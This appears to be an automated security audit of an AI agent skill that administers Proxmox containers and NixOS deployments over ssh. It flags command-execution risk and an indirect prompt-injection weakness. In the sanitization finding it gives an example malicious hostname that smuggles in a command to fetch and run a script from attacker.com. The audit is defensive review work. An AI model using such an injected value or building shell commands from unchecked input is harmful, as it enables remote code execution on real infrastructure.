infrastructure
Warn
Audited by Gen Agent Trust Hub on Feb 21, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- COMMAND_EXECUTION (MEDIUM): The skill is designed to perform administrative actions on remote infrastructure, which involves high-risk operations.
- It utilizes
sshto execute commands on Proxmox hosts, such aspct start,pct stop, andpct execfor container management. - It uses
colmenafor system-wide NixOS deployments, which can modify server configurations and services. - Access to
systemctlandjournalctlallows for service state manipulation and log retrieval across the cluster. - PROMPT_INJECTION (LOW): The skill is vulnerable to indirect prompt injection (Category 8) due to the way it constructs shell commands from variables.
- Ingestion points: The skill relies on user-provided values for
<hostname>,<vmid>,<proxmox-host>, and<service>as seen inSKILL.mdandreferences/host-mapping.md. - Boundary markers: There are no explicit boundary markers or instructions to the agent to sanitize these inputs before embedding them into shell strings.
- Capability inventory: The skill possesses extensive capabilities including remote command execution (
ssh), container orchestration (pct), and deployment tooling (colmena). - Sanitization: No sanitization or validation logic is documented. An attacker could potentially provide a malicious hostname (e.g.,
"host; curl attacker.com/script | bash") to trigger unintended command execution.
Audit Metadata